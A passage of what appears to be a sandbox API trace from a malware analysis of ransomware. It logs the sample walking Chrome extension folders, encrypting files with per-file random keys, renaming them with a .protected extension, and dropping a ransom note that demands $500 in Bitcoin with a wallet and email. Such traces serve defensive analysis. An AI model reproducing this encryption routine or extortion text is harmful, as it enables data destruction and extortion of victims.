Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json") returned 157 [0079.718] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json") returned 157 [0079.718] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.718] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json") returned 157 [0079.718] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.718] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.719] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.719] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.719] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.719] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.719] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.719] CloseHandle (hObject=0x168) returned 1 [0079.719] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.protected") returned 167 [0079.719] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\messages.json.protected")) returned 1 [0079.719] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.720] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.720] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\RESTORE_FILES.txt") returned 161 [0079.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\cs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.720] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.720] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.720] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.721] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.721] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.721] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.721] CloseHandle (hObject=0x164) returned 1 [0079.721] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.721] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0079.721] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0079.721] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0079.721] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0079.721] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0079.721] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da") returned 143 [0079.721] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0079.721] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0079.721] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\*") returned 145 [0079.721] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.721] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.721] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.721] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.721] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.721] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.721] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\.") returned 145 [0079.721] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.721] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.721] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.721] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.721] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.721] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.721] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.721] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\..") returned 146 [0079.721] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.721] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.721] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.721] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.722] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.722] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.722] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.722] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.722] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json") returned 157 [0079.722] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.722] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.722] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.722] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.722] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json") returned 157 [0079.722] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.722] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json") returned 157 [0079.722] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.722] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json") returned 157 [0079.722] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.722] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.723] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.723] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.723] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.723] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.723] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.723] CloseHandle (hObject=0x168) returned 1 [0079.723] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.protected") returned 167 [0079.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json.protected")) returned 1 [0079.724] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.724] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.724] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\RESTORE_FILES.txt") returned 161 [0079.724] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.725] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.725] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.725] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.725] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.725] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.725] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.726] CloseHandle (hObject=0x164) returned 1 [0079.726] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.726] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0079.726] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0079.726] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0079.726] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0079.726] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0079.726] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de") returned 143 [0079.726] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0079.726] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0079.726] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\*") returned 145 [0079.726] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.726] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.726] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.726] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.726] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.726] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.726] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\.") returned 145 [0079.727] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.727] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.727] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.727] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.727] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.727] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.727] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.727] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\..") returned 146 [0079.727] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.727] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.727] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.727] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.727] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.727] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.727] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.727] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.727] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json") returned 157 [0079.727] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.727] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.727] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.727] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json") returned 157 [0079.727] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 